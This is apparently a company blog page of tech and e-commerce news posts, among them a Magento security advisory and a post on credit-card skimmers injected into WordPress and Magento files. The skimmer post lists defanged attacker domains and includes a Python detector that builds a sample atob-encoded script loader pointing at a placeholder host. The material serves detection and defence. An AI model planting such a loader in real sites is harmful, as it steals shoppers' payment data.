
Simplio Labs Blog

Once we accept our limits, we go beyond them.
Albert Einstein

Google plans to give slow websites a new badge of shame in Chrome

What's New No Comment

Google is experimenting with a badge of shame for websites that load slowly in Chrome. “In the future, Chrome may identify sites that typically load fast or slow for users with clear badging,” explains a blog post from the Chrome team. “This may take a number of forms and we plan to experiment with different options, to determine which provides the most value to our users.”

A new badge could appear in the future that’s designed to highlight sites that are “authored in a way that makes them slow generally.” Google will look at historical load latencies to figure out which sites are guilty of slow load times and flag them, and the Chrome team is also exploring identifying sites that will load slowly based on device hardware or network connectivity.

Google is experimenting with having a loading screen (splash screen) to warn Chrome users, or a loading progress bar that would appear green if the site is fast and, presumably, red if it’s slow. “We are building out speed badging in close collaboration with other teams exploring labelling the quality of experiences at Google,” explains the Chrome team. “We are being very mindful with our approach to setting the bar for what is considered a good user experience and hope to land on something that is practically achievable by all developers.”

It’s not clear exactly when this new badging system will appear in Chrome, but Google unveiled its plans at the company’s Chrome Dev Summit in San Francisco today. The company has carefully worded its announcement with lots of “may” hedges, so it’s likely Google is looking for immediate feedback from web developers before it progresses.

Google also unveiled its vision for the future of Chrome today, and it appears the company is focusing on WebAssembly, powerful capabilities, and Progressive Web Apps (PWAs). Hopefully this will mean even more powerful web apps soon, and ones that feel a lot more like native apps.

Source: The Verge

Magento Warns E-Commerce Sites to Upgrade ASAP to Prevent Attacks

E-Commerce, What's New No Comment

The popular e-commerce platform Magento is urging web administrators to install its latest security update in order to defend against malicious attacks in the wild that could exploit a critical remote code-execution vulnerability.

While the company didn’t specify what kinds of potential attacks websites should be concerned about (Threatpost reached out for comment on this), Magento is a common target for the Magecart association of threat groups, which compromise websites built on unpatched e-commerce platforms in order to inject card-skimming scripts on checkout pages. The scripts steal unsuspecting customers’ payment card details and other information entered into the fields on the page.

The vulnerability (CVE-2019-8144), which carries a severity ranking of 10 out of 10 on the CVSS v.3 scale, could enable an unauthenticated user to insert a malicious payload into a merchant’s site through Page Builder template methods, and execute it. Page Builder allows websites to design content updates, preview them live and schedule them to be published. The bug specifically exists in the preview function.

The flaw affects Magento 2.3, and was patched in Magento Commerce 2.3.3 and with the security-only patch 2.3.2-p2, released in October. The company warned that patching will have the side effect of “blocking administrators from viewing previews for products, blocks and dynamic blocks”; but it said it will re-enable the preview functionality as soon as possible.

“We recommend that all merchants, even those who have already upgraded to 2.3.3 or applied security-only patch 2.3.2-p2, review the security of their Magento site to confirm that it was not potentially compromised before upgrade,” Piotr Kaminski of the Magento security team wrote in a posting on Monday. “Applying this hot fix or upgrading…will help defend your store against potential attacks going forward, but will not address the effects of an earlier attack.”

The same update patches several other critical remote-execution flaws with a CVSS v.3 score of 9 and above, as well as cross-site scripting (XSS) issues.

The warning comes as Magecart activity and infrastructure continue to saturate the web. According to analysis from RiskIQ last month, there are now 573 known command-and-control (C2) domains for the group, with close to 10,000 hosts actively loading those domains. In all, RiskIQ has detected almost 2 million (2,086,529) instances of Magecart’s JavaScript binaries, with over 18,000 e-commerce hosts directly breached.

“It is unfortunate that this kind of attack is still succeeding even though a mitigation is quite straightforward,” said Mounir Hahad, head of Juniper Threat Labs at Juniper Networks, via email. “As a last resort, website owners should periodically check the integrity of their script code, which can be as simple as calculating a checksum every few minutes to look for an unexpected change.”

What You Need To Know About Ad Fraud

E-Commerce No Comment

You will often come across advertisements online, data events, or even clicks that turn out to be false and just a method to get money. This practice of creating fraudulent advertising to generate revenue is known as ad fraud or invalid traffic. Now, ad frauds are usually banner ads, video ads or clicks.

Is Ad Fraud a Problem?

Ad fraud is actually a quite significant problem. It is known to cause damage of almost $20 billion every year. Ad fraud in digital marketing manipulates the traffic and user activity, scamming impressions and conversions. The statistics are changed and data appears distorted so that marketers are left confused and they fail to discover the fraud before it has already happened.

Kinds of Ad Fraud

  • Cookie stuffing

Cookies track a user’s path from affiliates to source sites and every time an affiliate link is clicked, there is an exchange. Now, when the user comes to the source site, it pays for the affiliate. In cookie stuffing, the stats and data of the source site are distorted and the site ends up paying much more than usual.

  • Traffic fraud

Generating traffic onto your site is a way of earning money but this traffic is very easy to imitate. Traffic fraud is imitation and manipulation of online traffic to con analytics into spending more for results based on data that is false.

  • Impression fraud

This kind of ad fraud falsifies the impressions which are an important part of CPM-based operations. These fake impressions are traded in place of the real ones, delivering no actual benefits. Such trading can take down the entire website.

  • Click fraud

In digital marketing, clicks generate revenue. What click fraud does is manipulate the ad activity to increase the number of CPC ad clicks and so you might see a large number of clicks but hardly any positive results.

  • Action fraud

Action Fraud is quite complicated. Actions distort the very elements that move money by imitating user activity and can actually end an entire campaign.

Other types of ad frauds include retargeting fraud, conversion fraud, and affiliate fraud.

How to Detect Ad Fraud?

While ad fraud is difficult to catch, it does not mean that you cannot detect it. If you have a single app and a single campaign it is easier to protect. However, the following indicators can detect ad fraud:

  • Similar install behavior for a few consecutive installs.
  • Many installs from one particular device.
  • A very large number of downloads from one particular source.
  • A very short period of time between a click and an install.

How Can You Stop Ad Fraud?

A few simple points are given below to help you stay alert and prevent ad fraud.

  • Know how your publisher is generating traffic before starting your campaign.
  • Invest in third party solutions that monitor campaigns and check for ad fraud.
  • Make sure that you have clear verification protocols and an immediate algorithm of actions in case of any suspicious activity.

This was all about ad frauds. Thus, adopt the required steps to stay safe.

Credit Skimmers Vulnerability

Developers, E-Commerce, What's New, Wordpress No Comment

We often write about malware that steals payment information from sites built with Magento and other types of e-commerce CMS.

When discussing credit card skimmers like Magecart, it’s sometimes overlooked that WordPress also has a decent share in the e-commerce segment. There are numerous popular plugins that can easily turn a WordPress site into a full-featured online store. In fact, WooCommerce alone has over 5 million installations.

Credit Card Skimmer Injected in WordPress Core

Our friend Salvador Aguilar over at Kinsta recently shared a few samples of malware found in the WordPress core files wp-includes/js/wp-util.min.js and wp-includes/js/admin-bar.min.js.

These JavaScript files both contained the following injected code, found at the very top.

[Figure: injected malware found in wp-includes/js/wp-util.min.js and wp-includes/js/admin-bar.min.js]

This injected code is a typical credit card skimmer, with “e.src=atob” containing the encoded URL of the external script. In this case, it is decoded to “hxxps://zendesk-chart[.]com/top/aco.js”.

Common Skimmer Variants Found on Magento

We regularly find these types of injected scripts on Magento sites. They use variations of atob (base64) obfuscation, along with hundreds of different domains and customised URLs.

For example, on one Magento site we found a nearly identical copy of the skimmer script (referenced above), with only a slight variation. This variant loads the skimmer from hxxps://zendesk-chart[.]com/uk/google.js (instead of /top/aco.js), which works with the checkout form for that particular site.
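A scanner for the pattern described in the two sections above (a script `src` assigned from an `atob` call) can decode the hidden URL so it can be reviewed. This is an added example, not code from the original article; the sample line, the `skimmer-demo.example` host and the allowlist parameter are constructed assumptions.

```python
import base64
import binascii
import re
from urllib.parse import urlsplit

# Matches  <something>.src = atob("...")  with either quote style.
ATOB_SRC = re.compile(
    r"""\.src\s*=\s*(?:window\.)?atob\(\s*(["'])([A-Za-z0-9+/=]+)\1\s*\)"""
)


def defang(url):
    """Rewrite a URL so it is safe to paste into a report (hxxps, [.])."""
    parts = urlsplit(url)
    scheme = parts.scheme.replace("http", "hxxp")
    host = parts.netloc.replace(".", "[.]")
    query = "?" + parts.query if parts.query else ""
    return f"{scheme}://{host}{parts.path}{query}"


def find_atob_loaders(js_text, allowed_hosts=frozenset()):
    """Return decoded script URLs that are hidden behind atob()."""
    findings = []
    for match in ATOB_SRC.finditer(js_text):
        try:
            decoded = base64.b64decode(match.group(2), validate=True).decode("utf-8")
        except (binascii.Error, UnicodeDecodeError):
            continue  # not valid base64 text, so not this pattern
        if decoded.startswith("//"):
            decoded = "https:" + decoded  # protocol-relative URL
        parts = urlsplit(decoded)
        if parts.scheme not in ("http", "https") or not parts.hostname:
            continue  # decodes to something other than a URL
        if parts.hostname in allowed_hosts:
            continue  # host the site owner has explicitly approved
        findings.append({
            "offset": match.start(),  # small offsets mean "top of file"
            "host": parts.hostname,
            "url": defang(decoded),
        })
    return findings


def build_sample():
    """Constructed input: one encoded loader line ahead of normal content."""
    url = "https://cdn.skimmer-demo.example/top/aco.js"  # placeholder URL
    encoded = base64.b64encode(url.encode()).decode()
    injected = f'e.src=atob("{encoded}");'
    legitimate = "\n/* original minified content */ window.wp=window.wp||{};"
    return injected + legitimate


if __name__ == "__main__":
    for finding in find_atob_loaders(build_sample()):
        print(f"offset {finding['offset']}: {finding['url']}")
```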

Domains Used by This Malware Campaign

Zendesk-chart[.]com was created on September 13, 2019, and it is now hosted on 185.254.121.64.

A quick lookup shows that the same server in Russia hosts the following domains:

jquery-web[.]com – Creation Date: 2019-01-21
jquery-stats[.]com – Creation Date: 2019-03-30
tracker-visitors[.]com – Creation Date: 2019-04-19
jquerycodemagento[.]com – Creation Date: 2019-08-11
gooqleadvstat[.]com – Creation Date: 2019-09-13
gooqlemgrteg[.]com – Creation Date: 2019-09-13
zendesk-chart[.]com – Creation Date: 2019-09-13
jquerystatic[.]com – Creation Date: 2019-09-13

All of these domains serve multiple versions of credit card stealers that can be found in the wild injected into various e-commerce sites.


Mitigation Steps

What is evident is that this is definitely not a fully automated mass infection, where hackers have a unified solution (list of vulnerabilities and the payload) that fits all scenarios. Each script has been customized—both name and content—for each specific compromised site.

In this malware campaign, the checkout page URLs are detected for each target. From there, custom code works to collect sensitive credit card information from the victim’s checkout form.

The malware itself is CMS agnostic—it doesn’t matter whether the site is using Magento, WordPress, or any other type of e-commerce CMS. If there is a form that accepts payment details and it can be hacked, nothing prevents the bad actor from installing a skimmer there.

E-commerce website owners should take the security of their websites very seriously, since they are ultimately responsible for any customer data breaches resulting from transactions on their online stores. Extra attention should be paid to the hardening and monitoring of web pages and server resources. Perform regular security scans on your web assets to detect malware and other indicators of compromise.


Shopify expands into email marketing

E-Commerce, What's New No Comment

Shopify continues to expand beyond its core e-commerce platform with a new product called Shopify Email.

Shopify’s chief product officer Craig Miller and director of product for marketing technology Michael Perry gave me a quick demo of the product yesterday; Miller argued that they’ve created “the first email product designed for e-commerce.”

That means it’s integrated with a merchant’s store on Shopify, allowing them to easily pull their brand assets into their emails, along with product content and listings. They can also see whether those emails actually lead customers to add products to their carts or purchase them. And they can create customer segments based on the data in Shopify.

“What we’re really proud of here is, we become the expert for them,” Perry said. “Most people we’ve surveyed don’t understand the value of segmentation, so we’ve taken the liberty of assembling the right list to add value for them.”

Shopify Email is currently available as an early access test for a limited group of merchants, ahead of a broader rollout next year. Miller said it will be free for these initial merchants, with general pricing to be announced later.

Other recent additions to Shopify’s product lineup include hardware for brick-and-mortar stores and digital ad tools.

“The common thread among all of [our new products] is to help brands sell directly to their customers,” Miller said. “There’s been a lot of talk lately about direct-to-consumer, but that’s something we’ve been doing for a decade and a half without calling it that.”

Facebook Unveils New Logo

What's New No Comment

On Monday, Facebook announced a new logo that will be used to represent itself as a parent company and to distinguish it from its apps, including Facebook app as well as WhatsApp and Instagram.

The new logo was announced through an official blog post alongside a GIF that alternates between different colors representing the different platforms that Facebook owns.

Below is the new logo as it transitions through Facebook, Instagram, and WhatsApp brand colors (blue for Facebook, green for WhatsApp, and purple, red and orange for Instagram).

“People should know which companies make the products they use. Our main services include the Facebook app, Messenger, Instagram, WhatsApp, Oculus, Workplace, Portal, and Calibra.
Today, we’re updating our company branding to be clearer that these products come from Facebook. We’re introducing a new corporate logo and further distinguishing the Facebook company from the Facebook app, which will keep its own branding.”

“The new brand system uses custom typography, rounded corners, open tracking and capitalization to create a visual distinction between the company and the app.” “We designed the new company wordmark with clarity and openness in mind.”

In June, the company started adding the words “from Facebook” across all its apps. Although it seems unnecessary, an alarming number of ‘regular’ users are unaware that Instagram and WhatsApp are owned by Facebook.

Over the coming weeks, Facebook will start using this new branding in its products so you’ll start to see it on things like the login page for Instagram (see photos above).

 

Source: Facebook Newsroom

Rewind Offers Free Holiday Data Backups for E-Commerce Platforms

E-Commerce, What's New No Comment

Rewind, a leading cloud data backup provider for e-commerce and cloud platforms, today announced the launch of Rewind: One-Time, a limited-time, complimentary version of its top-rated data protection software. Helping merchants on Shopify and BigCommerce, Rewind: One-Time can protect and quickly restore a retailer’s online store during the holiday shopping season.

“The holiday season can be an exciting time for merchants, but it can also be quite overwhelming with increased traffic to their stores. We’re excited to welcome the complimentary Rewind: One-Time app to our app store so that merchants can restore their data during the most critical time of the year,” said Fatima Yusuf, Strategic Partnerships Lead, Shopify.

Store uptime is essential for small and medium-sized retailers relying on cloud applications. Rewind has found that online stores have a one in five chance of losing their data at some point in time. Data disasters can happen from malicious acts, third-party integrations, or human error. Available now through December 31, 2019, Rewind: One-Time allows retailers to conduct a free, one-time backup of up to 10,000 products and related data tied to their e-commerce storefront so they can limit any downtime due to data issues.

“Data loss and the resulting downtime can be devastating to an ecommerce business. The Rewind for BigCommerce solution gives BigCommerce sellers the security they need to focus on growing their business — not recovering lost data. We’re pleased to be able to offer Rewind’s excellent integration and world-class customer support to our customers,” said MaryAnn Bekkedahl, SVP of Global Business Development, BigCommerce.

As minutes matter, retailers who take advantage of Rewind: One-Time will be able to restore their data to the exact day/time they installed. The one-time backup for BigCommerce includes product, brand, category, option set, and option data, while the one-time Shopify backup includes products, product images, custom collections and smart collections. The backups will be stored indefinitely in the secure Rewind Vault™.

“We want to ensure every BigCommerce and Shopify merchant knows their store data is fully protected this season so they can focus on generating sales, especially on peak days like Black Friday, Small Business Saturday and Cyber Monday,” said Mike Potter, CEO of Rewind. “With account-level data protection from Rewind: One-Time, retailers can ring in holiday sales rather than spend hours trying to recover deleted products or repair broken links and pages.”

Rewind: One-Time users can upgrade to one of the paid plan options at any time during the holiday season or beyond. Paid Rewind subscriptions add the ability for merchants to take advantage of ongoing, comprehensive backups so they can painlessly restore their full store experience (or select products, images, etc.) to any chosen date/time.


Adobe Introduces New Commerce Features For Magento

E-Commerce, What's New No Comment

Adobe is rolling out new capabilities to its enterprise eCommerce platform Magento that are targeted to small to medium-size businesses (SMBs) and mid-market merchants, Adobe said in a press release on Monday (Oct. 22).

Adobe is unveiling these latest features at MagentoLive Europe 2019, being held in Amsterdam Oct. 22-23. The improvements to the commerce platform aim to improve customers’ shopping experience.

“We’re now at an inflection point where companies of all sizes are perpetually challenged by soaring customer expectations to deliver amazing brand experiences. We’re committed to bringing Adobe’s enterprise-grade commerce capabilities to our SMB and mid-market customers to help them grow their business,” Adobe said in the release.

The release of Magento 2.3.3 includes performance and security enhancements to help merchants stay compliant with new regulations. Enhanced features also include integrating with Adobe Stock, an Amazon sales channel for the U.K., cloud infrastructure with Microsoft and an Adobe Sensei-powered product suggestion tool.

“We’re bolstering our multi-cloud capability by making Magento Commerce available on both Microsoft Azure and Amazon Web Services,” the release said.

The “highly anticipated” Adobe Stock integration with Magento offers a searchable interface to find, preview and embed art, such as photos and videos. Adobe Stock has over 130 million images, templates, 3D assets, stock videos and premium collection images.

Adobe acquired Magento’s cloud-based eCommerce platform last year for $1.68 billion. A Shopify competitor, it counts Coca-Cola, Warner Brothers Music, Canon and Nestle as customers.

Commerce Cloud was launched by Adobe in March. This fully managed cloud-based version of the Magento platform is fully integrated with benchmark Adobe tools like analytics, marketing and advertising. Amazon and Google integrations were also added.

On Amazon, merchants can automatically manage their inventory directly from the Magento platform. Users can set pricing rules for the Amazon sales channel, handle multiple brands at a time with access to multiple accounts, and get access to Amazon product data.

Magento also introduced a free native integration with Google Shopping that will let Magento admins manage Google ads from the Magento dashboard, as well as Google Merchant Center accounts.

5 Ways Mobile Apps Can Increase Revenue for Your Business

Business Advice No Comment

The use and benefits of mobile phones cannot be ignored or denied. They undoubtedly form an integral part of our life and existence without them can seem to be daunting. For carrying out many of our day to day tasks, we rely on our mobile phones and mobile apps – be it ordering food, shopping, calling a cab, booking a flight ticket, filling forms and what not!

So don’t you think that if you own a business, owning a mobile app can lead your business to greater heights?

For businesses of all kinds, going digital can make great money. Many startup owners are skeptical about getting their own website and mobile application developed, and they often ask why. Well, the answer is quite simple: it will yield business and profit!

  1. Opt for paid apps

As the title clearly suggests, bring forward the paid applications i.e., the users download the app by making a minimal payment and then end up using your services or products.

Do not charge too much as this will drive away your clients. Therefore, decide the fee smartly.

  2. Freemium apps

Freemium apps are undoubtedly one of the best ways to generate revenue from your mobile application. This simply means introducing applications that are free of cost but have some paid features. In this way, users will pay for those additional features if needed.

One such app is Grammarly. It allows you to freely access some of its features, whereas the enhanced ones are paid.

  3. Localization

This feature directly relates to the term “user-friendliness”. The interface of your app should be easy to understand and comprehend by people across the world.

This can be achieved by supporting multiple languages so that communication won’t stop you from generating good revenue and a fancy client base.

  4. Make use of push notifications

We know that today’s market hosts great competition in terms of all the services and products. For a particular service or product, multiple options, prices and providers are available.

Making use of push notifications helps you drive potential buyers to your mobile apps through alerts that remind them of a purchase or of new products and services.

  5. Integration of ASO updates

Now, does building the mobile application alone work all the miracles? The answer is clearly no. Updates are another feature that needs to be looked at.

This means that your app should be flexible enough to accommodate any update done by Google or Bing. Moreover, it should be platform friendly and must be able to run on all the possible platforms.

So, next time you think of having a start-up, don’t forget to get a mobile application developed. And if you want to generate a fancy revenue from the same, do ponder upon the above points.

 

Google Launches a New Portal for Small Businesses

E-Commerce No Comment

To celebrate International Small Business Day, Google today launched a new website that will suggest its products that seem like the best fit for a specific business.

 

 

The Google for Small Business portal was announced today at the Grow with Google Learning Center in New York City, where the company offers a variety of workshops and classes. During a break in the event, Kim Spalding, Google’s global product director for small business ads, told me that the website “gives everyone a place to start with Google products.”

After all, she said, “small business owners struggle with time” and particularly don’t have time to become experts on digital marketing.

So on the new site, they can enter their company name and website (assuming they have one), then answer a few questions about their business and their goals. Google will then create a customized, prioritized list of actions, which may involve launching ad campaigns, or building up their online presence, or installing Google Analytics.

Spalding suggested that this could be particularly useful for small businesses that are “just getting started,” as well as more established businesses that are starting to develop a digital strategy.

While Google for Small Business can recommend a wide range of products, Spalding pointed to two “hero tools” that are part of the lineup — Google My Business, which allows business owners to create their own profiles and websites, and is “a complete free product from start to finish,” as well as Smart Campaigns, which Google launched last year to automate the ad-buying process for small businesses.